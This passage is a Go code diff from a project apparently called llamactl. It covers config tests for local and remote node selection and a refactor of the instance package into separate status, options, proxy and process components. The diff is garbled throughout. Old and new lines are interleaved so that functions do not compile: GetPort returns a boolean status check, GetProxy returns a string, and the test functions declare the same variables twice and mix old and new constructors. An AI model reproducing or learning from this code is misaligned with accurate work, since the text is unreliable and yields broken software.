 		if cfg.LocalNode != "main" {
 			t.Errorf("Expected default local node 'main', got %q", cfg.LocalNode)
 		}
 	})
 	t.Run("local node from file", func(t *testing.T) {
 		tempDir := t.TempDir()
 		configFile := filepath.Join(tempDir, "test-config.yaml")
 		configContent := `
 local_node: "worker1"
 nodes:
   worker1:
     address: ""
   worker2:
     address: "http://192.168.1.10:8080"
     api_key: "test-key"
 `
 		err := os.WriteFile(configFile, []byte(configContent), 0644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
 		cfg, err := config.LoadConfig(configFile)
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "worker1" {
 			t.Errorf("Expected local node 'worker1', got %q", cfg.LocalNode)
 		}
 		// Verify the nodes map holds exactly the two configured nodes; no extra
 		// "main" entry is expected because the local node is listed in the file
 		if len(cfg.Nodes) != 2 {
 			t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
 		}
 		// Verify local node exists and is empty
 		localNode, exists := cfg.Nodes["worker1"]
 		if !exists {
 			t.Error("Expected local node 'worker1' to exist in nodes map")
 		}
 		if localNode.Address != "" {
 			t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
 		}
 		if localNode.APIKey != "" {
 			t.Errorf("Expected local node api_key to be empty, got %q", localNode.APIKey)
 		}
 		// Verify remote node
 		remoteNode, exists := cfg.Nodes["worker2"]
 		if !exists {
 			t.Error("Expected remote node 'worker2' to exist in nodes map")
 		}
 		if remoteNode.Address != "http://192.168.1.10:8080" {
 			t.Errorf("Expected remote node address 'http://192.168.1.10:8080', got %q", remoteNode.Address)
 		}
 		// Verify the default "main" node was NOT added
 		_, exists = cfg.Nodes["main"]
 		if exists {
 			t.Error("Default 'main' node should not exist when local_node is overridden")
 		}
 	})
 	t.Run("custom local node name in config", func(t *testing.T) {
 		tempDir := t.TempDir()
 		configFile := filepath.Join(tempDir, "test-config.yaml")
 		configContent := `
 local_node: "primary"
 nodes:
   primary:
     address: ""
   worker1:
     address: "http://192.168.1.10:8080"
 `
 		err := os.WriteFile(configFile, []byte(configContent), 0644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
 		cfg, err := config.LoadConfig(configFile)
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "primary" {
 			t.Errorf("Expected local node 'primary', got %q", cfg.LocalNode)
 		}
 		// Verify the nodes map holds exactly primary + worker1 (no default "main")
 		if len(cfg.Nodes) != 2 {
 			t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
 		}
 		localNode, exists := cfg.Nodes["primary"]
 		if !exists {
 			t.Error("Expected local node 'primary' to exist in nodes map")
 		}
 		if localNode.Address != "" {
 			t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
 		}
 	})
 	t.Run("local node from environment variable", func(t *testing.T) {
 		// t.Setenv restores the previous value (or unsets the variable) when the
 		// subtest ends, so a value already present in the environment is not lost.
 		t.Setenv("LLAMACTL_LOCAL_NODE", "custom-node")
 		cfg, err := config.LoadConfig("nonexistent-file.yaml")
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "custom-node" {
 			t.Errorf("Expected local node 'custom-node' from env var, got %q", cfg.LocalNode)
 		}
 	})
 }
--- a/pkg/instance/instance.go
+++ b/pkg/instance/instance.go
@@ -1,257 +1,316 @@
 package instance
 import (
 	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/config"
 	"log"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
 	"os/exec"
 	"sync"
 	"sync/atomic"
 	"time"
 )
-// TimeProvider interface allows for testing with mock time
+// Instance represents a running instance of the llama server
-type TimeProvider interface {
+type Instance struct {
-	Now() time.Time
+	Name    string `json:"name"`
-}
+	Created int64  `json:"created,omitempty"` // Unix timestamp when the instance was created
-// realTimeProvider implements TimeProvider using the actual time
+	// Global configuration
 type realTimeProvider struct{}
 func (realTimeProvider) Now() time.Time {
 	return time.Now()
 }
 // Process represents a running instance of the llama server
 type Process struct {
 	Name                   string                 `json:"name"`
 	options                *CreateInstanceOptions `json:"-"`
 	globalInstanceSettings *config.InstancesConfig
 	globalBackendSettings  *config.BackendConfig
 	globalNodesConfig      map[string]config.NodeConfig
 	localNodeName          string `json:"-"` // Name of the local node for remote detection
-	// Status
+	status  *status  `json:"-"`
-	Status         InstanceStatus `json:"status"`
+	options *options `json:"-"`
 	onStatusChange func(oldStatus, newStatus InstanceStatus)
-	// Creation time
+	// Components (can be nil for remote instances)
-	Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
+	process *process `json:"-"`
-
+	proxy   *proxy   `json:"-"`
-	// Logging file
+	logger  *logger  `json:"-"`
 	logger *InstanceLogger `json:"-"`
 	// internal
 	cmd      *exec.Cmd              `json:"-"` // Command to run the instance
 	ctx      context.Context        `json:"-"` // Context for managing the instance lifecycle
 	cancel   context.CancelFunc     `json:"-"` // Function to cancel the context
 	stdout   io.ReadCloser          `json:"-"` // Standard output stream
 	stderr   io.ReadCloser          `json:"-"` // Standard error stream
 	mu       sync.RWMutex           `json:"-"` // RWMutex for better read/write separation
 	restarts int                    `json:"-"` // Number of restarts
 	proxy    *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
 	// Restart control
 	restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
 	monitorDone   chan struct{}      `json:"-"` // Channel to signal monitor goroutine completion
 	// Timeout management
 	lastRequestTime atomic.Int64 // Unix timestamp of last request
 	timeProvider    TimeProvider `json:"-"` // Time provider for testing
 }
-// NewInstance creates a new instance with the given name, log path, and options
+// New creates a new instance with the given name, log path, options and local node name
-func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
+func New(name string, globalConfig *config.AppConfig, opts *Options, onStatusChange func(oldStatus, newStatus Status)) *Instance {
 	globalInstanceSettings := &globalConfig.Instances
 	globalBackendSettings := &globalConfig.Backends
 	globalNodesConfig := globalConfig.Nodes
 	localNodeName := globalConfig.LocalNode
 	// Validate and copy options
-	options.ValidateAndApplyDefaults(name, globalInstanceSettings)
+	opts.validateAndApplyDefaults(name, globalInstanceSettings)
-	// Create the instance logger
+	// Create status wrapper
-	logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
+	status := newStatus(Stopped)
 	status.onStatusChange = onStatusChange
-	return &Process{
+	// Create options wrapper
 	options := newOptions(opts)
 	instance := &Instance{
 		Name:                   name,
 		options:                options,
 		globalInstanceSettings: globalInstanceSettings,
 		globalBackendSettings:  globalBackendSettings,
-		logger:                 logger,
+		globalNodesConfig:      globalNodesConfig,
-		timeProvider:           realTimeProvider{},
+		localNodeName:          localNodeName,
 		Created:                time.Now().Unix(),
-		Status:                 Stopped,
+		status:                 status,
-		onStatusChange:         onStatusChange,
+	}
 	var err error
 	instance.proxy, err = newProxy(instance)
 	if err != nil {
 		log.Println("Warning: Failed to create proxy for instance", instance.Name, "-", err)
 	}
 	// Only create logger and process for local instances (the proxy is created above for all instances)
 	if !instance.IsRemote() {
 		instance.logger = newLogger(name, globalInstanceSettings.LogsDir)
 		instance.process = newProcess(instance)
 	}
 	return instance
 }
 // Start delegates to the process component's start method.
 // It returns an error when the instance has no process component.
 func (i *Instance) Start() error {
 	if i.process != nil {
 		return i.process.start()
 	}
 	return fmt.Errorf("instance %s has no process component (remote instances cannot be started locally)", i.Name)
 }
 // Stop delegates to the process component's stop method.
 // It returns an error when the instance has no process component.
 func (i *Instance) Stop() error {
 	if i.process != nil {
 		return i.process.stop()
 	}
 	return fmt.Errorf("instance %s has no process component (remote instances cannot be stopped locally)", i.Name)
 }
 // Restart delegates to the process component's restart method.
 // It returns an error when the instance has no process component.
 func (i *Instance) Restart() error {
 	if i.process != nil {
 		return i.process.restart()
 	}
 	return fmt.Errorf("instance %s has no process component (remote instances cannot be restarted locally)", i.Name)
 }
 // WaitForHealthy forwards the given timeout to the process component's
 // health wait and returns its result. It returns an error when the
 // instance has no process component.
 func (i *Instance) WaitForHealthy(timeout int) error {
 	if i.process != nil {
 		return i.process.waitForHealthy(timeout)
 	}
 	return fmt.Errorf("instance %s has no process component (remote instances cannot be health checked locally)", i.Name)
 }
 // GetOptions returns the options held by the options wrapper,
 // or nil when the instance has no options wrapper.
 func (i *Instance) GetOptions() *Options {
 	if i.options != nil {
 		return i.options.get()
 	}
 	return nil
 }
 // GetStatus returns the status held by the status wrapper.
 // An instance without a status wrapper reports Stopped.
 func (i *Instance) GetStatus() Status {
 	if i.status != nil {
 		return i.status.get()
 	}
 	return Stopped
 }
 // SetStatus stores s in the status wrapper.
 // It is a no-op when the instance has no status wrapper.
 func (i *Instance) SetStatus(s Status) {
 	if i.status == nil {
 		return
 	}
 	i.status.set(s)
 }
-func (i *Process) GetOptions() *CreateInstanceOptions {
+// IsRunning returns true if the status is Running
-	i.mu.RLock()
+func (i *Instance) IsRunning() bool {
-	defer i.mu.RUnlock()
+	if i.status == nil {
-	return i.options
+		return false
 }
 func (i *Process) GetPort() int {
 	i.mu.RLock()
 	defer i.mu.RUnlock()
 	if i.options != nil {
 		switch i.options.BackendType {
 		case backends.BackendTypeLlamaCpp:
 			if i.options.LlamaServerOptions != nil {
 				return i.options.LlamaServerOptions.Port
 			}
 		case backends.BackendTypeMlxLm:
 			if i.options.MlxServerOptions != nil {
 				return i.options.MlxServerOptions.Port
 			}
 		case backends.BackendTypeVllm:
 			if i.options.VllmServerOptions != nil {
 				return i.options.VllmServerOptions.Port
 			}
 		}
 	}
-	return 0
+	return i.status.isRunning()
 }
-func (i *Process) GetHost() string {
+// SetOptions sets the options
-	i.mu.RLock()
+func (i *Instance) SetOptions(opts *Options) {
-	defer i.mu.RUnlock()
+	if opts == nil {
 	if i.options != nil {
 		switch i.options.BackendType {
 		case backends.BackendTypeLlamaCpp:
 			if i.options.LlamaServerOptions != nil {
 				return i.options.LlamaServerOptions.Host
 			}
 		case backends.BackendTypeMlxLm:
 			if i.options.MlxServerOptions != nil {
 				return i.options.MlxServerOptions.Host
 			}
 		case backends.BackendTypeVllm:
 			if i.options.VllmServerOptions != nil {
 				return i.options.VllmServerOptions.Host
 			}
 		}
 	}
 	return ""
 }
 func (i *Process) SetOptions(options *CreateInstanceOptions) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if options == nil {
 		log.Println("Warning: Attempted to set nil options on instance", i.Name)
 		return
 	}
-	// Validate and copy options
+	// Preserve the original nodes to prevent changing instance location
-	options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
+	if i.options != nil && i.options.get() != nil {
 		opts.Nodes = i.options.get().Nodes
 	}
 	// Validate and copy options
 	opts.validateAndApplyDefaults(i.Name, i.globalInstanceSettings)
 	if i.options != nil {
 		i.options.set(opts)
 	}
 	i.options = options
 	// Clear the proxy so it gets recreated with new options
-	i.proxy = nil
+	if i.proxy != nil {
 		i.proxy.clear()
 	}
 }
 // SetTimeProvider sets a custom time provider for testing
-func (i *Process) SetTimeProvider(tp TimeProvider) {
+func (i *Instance) SetTimeProvider(tp TimeProvider) {
-	i.timeProvider = tp
+	if i.proxy != nil {
 		i.proxy.setTimeProvider(tp)
 	}
 }
-// GetProxy returns the reverse proxy for this instance, creating it if needed
+func (i *Instance) GetHost() string {
 func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.proxy != nil {
 		return i.proxy, nil
 	}
 	if i.options == nil {
-		return nil, fmt.Errorf("instance %s has no options set", i.Name)
+		return "localhost"
 	}
 	return i.options.GetHost()
 }
 // GetPort returns the port reported by the instance options,
 // or 0 when the instance has no options.
 func (i *Instance) GetPort() int {
 	if i.options != nil {
 		return i.options.GetPort()
 	}
 	return 0
 }
 // GetProxy returns the reverse proxy for this instance
 func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
 	if i.proxy == nil {
 		return nil, fmt.Errorf("instance %s has no proxy component", i.Name)
 	}
-	var host string
+	return i.proxy.get()
-	var port int
+}
-	switch i.options.BackendType {
+
-	case backends.BackendTypeLlamaCpp:
+func (i *Instance) IsRemote() bool {
-		if i.options.LlamaServerOptions != nil {
+	opts := i.GetOptions()
-			host = i.options.LlamaServerOptions.Host
+	if opts == nil {
-			port = i.options.LlamaServerOptions.Port
+		return false
 		}
 	case backends.BackendTypeMlxLm:
 		if i.options.MlxServerOptions != nil {
 			host = i.options.MlxServerOptions.Host
 			port = i.options.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if i.options.VllmServerOptions != nil {
 			host = i.options.VllmServerOptions.Host
 			port = i.options.VllmServerOptions.Port
 		}
 	}
-	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
+	// If no nodes specified, it's a local instance
-	if err != nil {
+	if len(opts.Nodes) == 0 {
-		return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
+		return false
 	}
-	proxy := httputil.NewSingleHostReverseProxy(targetURL)
+	// If the local node is in the nodes map, treat it as a local instance
 	if _, isLocal := opts.Nodes[i.localNodeName]; isLocal {
 		return false
 	}
-	proxy.ModifyResponse = func(resp *http.Response) error {
+	// Otherwise, it's a remote instance
-		// Remove CORS headers from llama-server response to avoid conflicts
+	return true
-		// llamactl will add its own CORS headers
+}
-		resp.Header.Del("Access-Control-Allow-Origin")
+
-		resp.Header.Del("Access-Control-Allow-Methods")
+// GetLogs retrieves the last n lines of logs from the instance
-		resp.Header.Del("Access-Control-Allow-Headers")
+func (i *Instance) GetLogs(num_lines int) (string, error) {
-		resp.Header.Del("Access-Control-Allow-Credentials")
+	if i.logger == nil {
-		resp.Header.Del("Access-Control-Max-Age")
+		return "", fmt.Errorf("instance %s has no logger (remote instances don't have logs)", i.Name)
-		resp.Header.Del("Access-Control-Expose-Headers")
+	}
 	return i.logger.getLogs(num_lines)
 }
 // LastRequestTime returns the last request time tracked by the proxy
 // component, or 0 when the instance has no proxy.
 func (i *Instance) LastRequestTime() int64 {
 	if i.proxy != nil {
 		return i.proxy.getLastRequestTime()
 	}
 	return 0
 }
 // UpdateLastRequestTime asks the proxy component to refresh its last
 // request time. It is a no-op when the instance has no proxy.
 func (i *Instance) UpdateLastRequestTime() {
 	if i.proxy == nil {
 		return
 	}
 	i.proxy.updateLastRequestTime()
 }
 // ShouldTimeout reports the proxy component's timeout decision.
 // An instance without a proxy never times out.
 func (i *Instance) ShouldTimeout() bool {
 	if i.proxy != nil {
 		return i.proxy.shouldTimeout()
 	}
 	return false
 }
 // getCommand returns the command produced by the backend options for the
 // global backend settings, or an empty string when no options are set.
 func (i *Instance) getCommand() string {
 	if opts := i.GetOptions(); opts != nil {
 		return opts.BackendOptions.GetCommand(i.globalBackendSettings)
 	}
 	return ""
 }
 func (i *Instance) buildCommandArgs() []string {
 	opts := i.GetOptions()
 	if opts == nil {
 		return nil
 	}
-	i.proxy = proxy
+	return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
 }
-	return i.proxy, nil
+func (i *Instance) buildEnvironment() map[string]string {
 	opts := i.GetOptions()
 	if opts == nil {
 		return nil
 	}
 	return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
 }
 // MarshalJSON implements json.Marshaler for Instance
-func (i *Process) MarshalJSON() ([]byte, error) {
+func (i *Instance) MarshalJSON() ([]byte, error) {
-	// Use read lock since we're only reading data
+	// Get options
-	i.mu.RLock()
+	opts := i.GetOptions()
-	defer i.mu.RUnlock()
+
 	// Determine if docker is enabled for this instance's backend
 	dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
 	// Use anonymous struct to avoid recursion
 	type Alias Process
 	return json.Marshal(&struct {
-		*Alias
+		Name          string   `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
+		Status        *status  `json:"status"`
 		Created       int64    `json:"created,omitempty"`
 		Options       *options `json:"options,omitempty"`
 		DockerEnabled bool     `json:"docker_enabled,omitempty"`
 	}{
-		Alias:   (*Alias)(i),
+		Name:          i.Name,
-		Options: i.options,
+		Status:        i.status,
 		Created:       i.Created,
 		Options:       i.options,
 		DockerEnabled: dockerEnabled,
 	})
 }
 // UnmarshalJSON implements json.Unmarshaler for Instance
-func (i *Process) UnmarshalJSON(data []byte) error {
+func (i *Instance) UnmarshalJSON(data []byte) error {
-	// Use anonymous struct to avoid recursion
+	// Explicitly deserialize to match MarshalJSON format
 	type Alias Process
 	aux := &struct {
-		*Alias
+		Name    string   `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
+		Status  *status  `json:"status"`
-	}{
+		Created int64    `json:"created,omitempty"`
-		Alias: (*Alias)(i),
+		Options *options `json:"options,omitempty"`
-	}
+	}{}
 	if err := json.Unmarshal(data, aux); err != nil {
 		return err
 	}
-	// Handle options with validation and defaults
+	// Set the fields
-	if aux.Options != nil {
+	i.Name = aux.Name
-		aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
+	i.Created = aux.Created
-		i.options = aux.Options
+	i.status = aux.Status
-	}
+	i.options = aux.Options
 	return nil
 }
--- a/pkg/instance/instance_test.go
+++ b/pkg/instance/instance_test.go
@@ -3,38 +3,53 @@ package instance_test
 import (
 	"encoding/json"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"testing"
 	"time"
 )
 func TestNewInstance(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir:             "/tmp/test",
 			DefaultAutoRestart:  true,
 			DefaultMaxRestarts:  3,
 			DefaultRestartDelay: 5,
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	options := &instance.Options{
-		LogsDir:             "/tmp/test",
+		BackendOptions: backends.Options{
-		DefaultAutoRestart:  true,
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultMaxRestarts:  3,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultRestartDelay: 5,
+				Model: "/path/to/model.gguf",
-	}
+				Port:  8080,
-
+			},
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
 	if inst.Name != "test-instance" {
 		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
@@ -45,8 +60,8 @@ func TestNewInstance(t *testing.T) {
 	// Check that options were properly set with defaults applied
 	opts := inst.GetOptions()
-	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -62,94 +77,89 @@ func TestNewInstance(t *testing.T) {
 	if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
 		t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
 	}
 }
-func TestNewInstance_WithRestartOptions(t *testing.T) {
+	// Test that explicit values override defaults
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 	// Override some defaults
 	autoRestart := false
 	maxRestarts := 10
-	restartDelay := 15
+	optionsWithOverrides := &instance.Options{
-
+		AutoRestart: &autoRestart,
-	options := &instance.CreateInstanceOptions{
+		MaxRestarts: &maxRestarts,
-		AutoRestart:  &autoRestart,
+		BackendOptions: backends.Options{
-		MaxRestarts:  &maxRestarts,
+			BackendType: backends.BackendTypeLlamaCpp,
-		RestartDelay: &restartDelay,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		BackendType:  backends.BackendTypeLlamaCpp,
+				Model: "/path/to/model.gguf",
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			},
 			Model: "/path/to/model.gguf",
 		},
 	}
-	// Mock onStatusChange function
+	inst2 := instance.New("test-override", globalConfig, optionsWithOverrides, mockOnStatusChange)
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	opts2 := inst2.GetOptions()
-	instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	if opts2.AutoRestart == nil || *opts2.AutoRestart {
 	opts := instance.GetOptions()
 	// Check that explicit values override defaults
 	if opts.AutoRestart == nil || *opts.AutoRestart {
 		t.Error("Expected AutoRestart to be false (overridden)")
 	}
-	if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
+	if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
-		t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
+		t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
 	}
 	if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
 		t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
 	}
 }
 func TestSetOptions(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir:             "/tmp/test",
 			DefaultAutoRestart:  true,
 			DefaultMaxRestarts:  3,
 			DefaultRestartDelay: 5,
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	initialOptions := &instance.Options{
-		LogsDir:             "/tmp/test",
+		BackendOptions: backends.Options{
-		DefaultAutoRestart:  true,
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultMaxRestarts:  3,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultRestartDelay: 5,
+				Model: "/path/to/model.gguf",
-	}
+				Port:  8080,
-
+			},
 	initialOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, initialOptions, mockOnStatusChange)
 	// Update options
-	newOptions := &instance.CreateInstanceOptions{
+	newOptions := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/new-model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
-			Port:  8081,
+				Model: "/path/to/new-model.gguf",
 				Port:  8081,
 			},
 		},
 	}
 	inst.SetOptions(newOptions)
 	opts := inst.GetOptions()
-	if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
-		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8081 {
 		t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
@@ -162,27 +172,43 @@ func TestSetOptions(t *testing.T) {
 }
 func TestGetProxy(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir: "/tmp/test",
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	options := &instance.Options{
-		LogsDir: "/tmp/test",
+		Nodes: map[string]struct{}{"main": {}},
-	}
+		BackendOptions: backends.Options{
-
+			BackendType: backends.BackendTypeLlamaCpp,
-	options := &instance.CreateInstanceOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		BackendType: backends.BackendTypeLlamaCpp,
+				Host: "localhost",
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				Port: 8080,
-			Host: "localhost",
+			},
 			Port: 8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
 	// Get proxy for the first time
 	proxy1, err := inst.GetProxy()
@@ -204,40 +230,34 @@ func TestGetProxy(t *testing.T) {
 }
 func TestMarshalJSON(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-
+	options := &instance.Options{
-	globalSettings := &config.InstancesConfig{
+		BackendOptions: backends.Options{
-		LogsDir:             "/tmp/test",
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultAutoRestart:  true,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultMaxRestarts:  3,
+				Model: "/path/to/model.gguf",
-		DefaultRestartDelay: 5,
+				Port:  8080,
-	}
+			},
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
-	// Mock onStatusChange function
+	inst := instance.New("test-instance", globalConfig, options, nil)
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
-	instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	data, err := json.Marshal(inst)
 	data, err := json.Marshal(instance)
 	if err != nil {
 		t.Fatalf("JSON marshal failed: %v", err)
 	}
-	// Check that JSON contains expected fields
+	// Verify by unmarshaling and checking key fields
 	var result map[string]any
-	err = json.Unmarshal(data, &result)
+	if err := json.Unmarshal(data, &result); err != nil {
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
 	}
@@ -247,37 +267,9 @@ func TestMarshalJSON(t *testing.T) {
 	if result["status"] != "stopped" {
 		t.Errorf("Expected status 'stopped', got %v", result["status"])
 	}
-
+	if result["options"] == nil {
 	// Check that options are included
 	options_data, ok := result["options"]
 	if !ok {
 		t.Error("Expected options to be included in JSON")
 	}
 	options_map, ok := options_data.(map[string]interface{})
 	if !ok {
 		t.Error("Expected options to be a map")
 	}
 	// Check backend type
 	if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
 		t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
 	}
 	// Check backend options
 	backend_options_data, ok := options_map["backend_options"]
 	if !ok {
 		t.Error("Expected backend_options to be included in JSON")
 	}
 	backend_options_map, ok := backend_options_data.(map[string]any)
 	if !ok {
 		t.Error("Expected backend_options to be a map")
 	}
 	if backend_options_map["model"] != "/path/to/model.gguf" {
 		t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
 	}
 	if backend_options_map["port"] != float64(8080) {
